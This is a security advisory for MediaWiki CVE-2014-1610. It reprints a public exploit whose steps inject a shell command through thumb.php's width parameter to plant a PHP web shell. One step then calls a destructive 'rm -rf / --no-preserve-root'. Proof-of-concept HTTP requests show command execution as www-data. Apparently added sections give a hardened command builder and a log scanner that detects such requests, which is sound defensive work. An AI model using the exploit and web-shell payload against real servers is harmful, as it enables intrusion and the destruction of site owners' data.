Multiple Remote Code Execution Vulnerabilities in MediaWiki
Release date:
Updated on:
Affected Systems:
MediaWiki <= 1.22.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65223
CVE (CAN) ID: CVE-2014-1610
MediaWiki is a widely used wiki application running on PHP and MySQL.
MediaWiki before 1.19.11, 1.21.x before 1.21.5 and 1.22.x before 1.22.2, when DjVu or PDF file upload support is enabled, allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the page parameter to includes/media/DjVu.php, (2) the w parameter (width) to thumb.php as processed by includes/media/Bitmap.php, or (3) the w parameter to thumb.php as processed by includes/media/ImageHandler.php. The parameter is interpolated into a shell command line without escaping, so the command runs with the privileges of the web server.
<* Source: Netanel Rubin
Link: http://secunia.com/advisories/56695
http://www.exploit-db.com/exploits/31329/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
####################################################################
#
# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
# Reported by Netanel Rubin - Check Point's Vulnerability Research Group (Jan 19, 2014)
# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)
# Affected website: Wikipedia.org and more!
#
# Exploit author: Xelenonz & @u0x (Pichaya Morimoto)
# Release dates: Feb 1, 2014
# Special Thanks to 2600 Thailand!
#
####################################################################
# Exploit:
####################################################################
1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
   http://vulnerable-site/index.php/Special:Upload
2. inject OS cmd to upload a php-backdoor
   http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|'echo%20"<?php%20system(\$_GET[1]);">images/xnz.php'
3. access to php-backdoor!
   http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root
4. happy pwning !!
# Related files:
####################################################################
thumb.php <-- extract all _GET array to params
/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width options
/includes/media/ImageHandler.php
/includes/GlobalFunctions.php
/includes/filerepo/file/File.php
# Vulnerability Analysis:
####################################################################
1. thumb.php
This script is used to resize images, if it is configured to do so, when the web browser requests the image.
<?php ...
1.1 Called directly, use $_GET params
wfThumbHandleRequest();
1.2 Handle a thumbnail request via query parameters
function wfThumbHandleRequest() {
    $params = get_magic_quotes_gpc()
        ? array_map( 'stripslashes', $_GET )
        : $_GET; // <-- WTF
    wfStreamThumb( $params ); // stream the thumbnail
}
1.3 Stream a thumbnail specified by parameters
function wfStreamThumb( array $params ) {
    ...
    $fileName = isset( $params['f'] ) ? $params['f'] : ''; // <-- puts uploaded.pdf file here
    ...
    // Backwards compatibility parameters
    if ( isset( $params['w'] ) ) {
        $params['width'] = $params['w']; // <-- Inject OS cmd here!
        unset( $params['w'] );
    }
    ...
    $img = wfLocalFile( $fileName );
    ...
    // Thumbnail isn't already there, so create the new thumbnail...
    $thumb = $img->transform( $params, File::RENDER_NOW ); // <-- resize image by width/height
    ...
    // Stream the file if there were no errors
    $thumb->streamFile( $headers );
    ...
?>
2. /includes/filerepo/file/File.php
<?php ...
function transform( $params, $flags = 0 ) { ...
    $handler = $this->getHandler(); // <-- PDF Handler
    ...
    $normalisedParams = $params;
    $handler->normaliseParams( $this, $normalisedParams );
    ...
    $thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );
    ...
?>
3. /extensions/PdfHandler/PdfHandler_body.php
<?php ...
function doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {
    ...
    $width = $params['width'];
    ...
    $cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // <-- craft shell cmd & parameters
    $cmd .= " -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page} -dLastPage={$page}";
    $cmd .= " -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q " . wfEscapeShellArg( $srcPath );
    $cmd .= " | " . wfEscapeShellArg( $wgPdfPostProcessor );
    $cmd .= " -depth 8 -resize {$width} - "; // <-- FAILED to escape shell argument
    $cmd .= wfEscapeShellArg( $dstPath ) . ")";
    $cmd .= " 2>&1";
    ...
    $err = wfShellExec( $cmd, $retval );
    ...
?>
4. /includes/GlobalFunctions.php
Execute a shell command, with time and memory limits
<?php ...
function wfShellExec( $cmd, &$retval = null, $environ = array(), $limits = array() ) {
    ...
    passthru( $cmd, $retval ); // <-- Execute here!!
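The analysis above ends at the unescaped `{$width}` interpolation. The following is an added illustration, not code from MediaWiki, PdfHandler or the advisory: it rebuilds that command-construction pattern in plain PHP and places a hardened variant beside it, so the difference between "integer parameter pasted into a shell string" and "validated, then quoted" is visible without running anything. The `_demo` function names, the fixed `gs` and `/usr/bin/convert` paths and the sample file paths are assumptions made for this example; PHP's built-in `escapeshellarg()` stands in for MediaWiki's `wfEscapeShellArg()`.

```php
<?php
// Added illustration (not MediaWiki or PdfHandler code): the unescaped
// "{$width}" interpolation seen in PdfHandler::doTransform, rebuilt beside a
// hardened version. Names ending in _demo are assumptions for this example;
// escapeshellarg() stands in for wfEscapeShellArg(). Nothing is executed.

// Vulnerable pattern: $width arrives from thumb.php's $_GET['w'] and is pasted
// into the command line without validation or quoting.
function build_cmd_vulnerable_demo(string $srcPath, string $dstPath, string $width, int $page = 1): string
{
    $cmd  = '(' . escapeshellarg('gs');
    $cmd .= " -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page} -dLastPage={$page}";
    $cmd .= ' -r150 -dBATCH -dNOPAUSE -q ' . escapeshellarg($srcPath);
    $cmd .= ' | ' . escapeshellarg('/usr/bin/convert');
    $cmd .= " -depth 8 -resize {$width} - ";      // <-- attacker-controlled, unescaped
    $cmd .= escapeshellarg($dstPath) . ')';
    return $cmd . ' 2>&1';
}

// Hardened step 1: a thumbnail width is a bounded positive integer, nothing else.
// ctype_digit() rejects the empty string, signs, whitespace and every shell
// metacharacter, so a value such as "10|'id'" never reaches the command builder.
function normalise_width_demo($width, int $max = 4096): int
{
    $s = is_int($width) ? (string) $width : $width;
    if (!is_string($s) || !ctype_digit($s) || (int) $s < 1 || (int) $s > $max) {
        throw new InvalidArgumentException('invalid thumbnail width: ' . var_export($width, true));
    }
    return (int) $s;
}

// Hardened step 2: validate first, then quote every interpolated value anyway,
// so a future non-integer parameter cannot reopen the same hole.
function build_cmd_hardened_demo(string $srcPath, string $dstPath, $width, int $page = 1): string
{
    $w = normalise_width_demo($width);
    $p = escapeshellarg((string) $page);
    $cmd  = '(' . escapeshellarg('gs');
    $cmd .= " -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$p} -dLastPage={$p}";
    $cmd .= ' -r150 -dBATCH -dNOPAUSE -q ' . escapeshellarg($srcPath);
    $cmd .= ' | ' . escapeshellarg('/usr/bin/convert');
    $cmd .= ' -depth 8 -resize ' . escapeshellarg((string) $w) . ' - ';
    $cmd .= escapeshellarg($dstPath) . ')';
    return $cmd . ' 2>&1';
}

// Demonstration only: the command strings are built and printed, never run.
$src = '/var/www/mediawiki/images/2/27/Longcat.pdf';   // constructed path
$dst = '/tmp/transform_demo.jpg';                        // constructed path
foreach (['10', "10|'id'"] as $width) {
    echo "width = {$width}\n";
    echo '  vulnerable: ' . build_cmd_vulnerable_demo($src, $dst, $width) . "\n";
    try {
        echo '  hardened:   ' . build_cmd_hardened_demo($src, $dst, $width) . "\n";
    } catch (InvalidArgumentException $e) {
        echo '  hardened:   rejected (' . $e->getMessage() . ")\n";
    }
}
```

Run it with `php demo.php`: for the benign width both builders produce the same pipeline; for the metacharacter value the vulnerable builder emits `-resize 10|'id' -` inside the shell string, while the hardened builder throws before any command exists. The decisive control is the integer validation (the place MediaWiki's `normaliseParams` should have enforced it); quoting the value after validation is defence in depth.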
# Proof-Of-Concept
####################################################################
GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|'echo%20%22%3C?php%20system(\$_GET[1]);%22%3Eimages/longcat.php' HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=op3h2huvddnmg7gji0pscfsg02

<html><body>
<h1>Error generating thumbnail</h1>
<p>
เกิดปัญหาไม่สามารถทำรูปย่อได้: /bin/bash: -: command not found<br/>
convert: option requires an argument `-resize' @ error/convert.c/ConvertImageCommand/2380.<br/>
GPL Ghostscript 9.10: Unrecoverable error, exit code 1<br/>
</p>
</body>
</html>

GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=bv1_n4o0sn6ug04lg26luqfcg1

uid=33(www-data) gid=33(www-data) groups=33(www-data)
# Back-end $cmd
####################################################################
GlobalFunctions.php: wfShellExec()
$cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' | '/usr/bin/convert' -depth 8 -resize 10|'echo "<?php system(\$_GET[1]);">images/longcat.php' - '/tmp/transform_0e377aad0e27-1.jpg') 2>&1
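The proof of concept leaves two traces a defender can look for: a thumb.php request whose w/width (or, for the DjVu variant, page) parameter carries shell metacharacters, and a PHP file written under the images/ upload directory. The script below is an added example, not part of the advisory, the exploit or MediaWiki: a small PHP CLI triage helper that scans access-log lines for such requests and lists PHP files under the upload directory. The log format, the sample log lines, the directory path and the function names are constructed for this illustration.

```php
<?php
// Added example (not part of the advisory, the exploit or MediaWiki): a triage
// helper that flags thumb.php requests with shell metacharacters in the
// parameters this advisory names, and lists PHP files left in the upload
// directory. Log format, sample lines, paths and names are constructed here.

// Parameters thumb.php hands to the media handler: w/width per this advisory,
// page for the DjVu variant named in the CVE description.
const THUMB_RISKY_PARAMS = ['w', 'width', 'page'];

// Characters that never belong in an integer thumbnail parameter.
const SHELL_META_RE = '/[|;&`$(){}<>\'"\\\\]/';

function find_thumb_injections(array $logLines): array
{
    $hits = [];
    foreach ($logLines as $i => $line) {
        // Request line of the common/combined log format: "GET /path?query HTTP/1.1"
        if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $url = parse_url($m[1]);
        if ($url === false || empty($url['path']) || empty($url['query'])
            || !preg_match('#/thumb\.php$#', $url['path'])) {
            continue;
        }
        parse_str($url['query'], $query);   // percent-decodes the values
        foreach (THUMB_RISKY_PARAMS as $name) {
            if (!isset($query[$name]) || !is_string($query[$name])) {
                continue;
            }
            $value = $query[$name];
            if (!ctype_digit($value) && preg_match(SHELL_META_RE, $value)) {
                $hits[] = ['line' => $i + 1, 'param' => $name, 'value' => $value];
            }
        }
    }
    return $hits;
}

// A thumbnail request must never leave executable code behind: any PHP file
// under the images/ upload directory deserves an analyst's attention.
function find_php_in_uploads(string $imagesDir): array
{
    $found = [];
    if (!is_dir($imagesDir)) {
        return $found;
    }
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($imagesDir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (preg_match('/\.ph(p|tml|ar)\d?$/i', $file->getFilename())) {
            $found[] = $file->getPathname();
        }
    }
    return $found;
}

// Constructed sample log lines: a benign thumbnail request, two injection
// attempts (one via w, one via page) and an unrelated page view.
$sample = [
    '127.0.0.1 - - [01/Feb/2014:10:00:01 +0700] "GET /mediawiki1221/thumb.php?f=Longcat.pdf&w=120 HTTP/1.1" 200 5120',
    '127.0.0.1 - - [01/Feb/2014:10:00:02 +0700] "GET /mediawiki1221/thumb.php?f=Longcat.pdf&w=10%7C%27id%27 HTTP/1.1" 500 412',
    '127.0.0.1 - - [01/Feb/2014:10:00:03 +0700] "GET /mediawiki1221/index.php?title=Main_Page HTTP/1.1" 200 9001',
    '127.0.0.1 - - [01/Feb/2014:10:00:04 +0700] "GET /mediawiki1221/thumb.php?f=doc.djvu&page=1%3Bid HTTP/1.1" 500 300',
];

foreach (find_thumb_injections($sample) as $hit) {
    printf("line %d: suspicious %s=%s\n", $hit['line'], $hit['param'], $hit['value']);
}

foreach (find_php_in_uploads('/var/www/mediawiki/images') as $path) {   // constructed path
    echo "PHP file in upload directory: {$path}\n";
}
```

On the constructed sample the scanner reports the second line (`w=10|'id'`) and the fourth (`page=1;id`) and ignores the benign `w=120` request. Point `find_php_in_uploads()` at the real images/ directory of an instance that ran a vulnerable version; the proof of concept above shows exactly this kind of artifact (images/longcat.php) being written by the web-server user.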
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
MediaWiki
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://wikipedia.sourceforge.net/
http://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html
https://www.mediawiki.org/wiki/Release_notes/1.22
https://www.mediawiki.org/wiki/Release_notes/1.21
https://www.mediawiki.org/wiki/Release_notes/1.19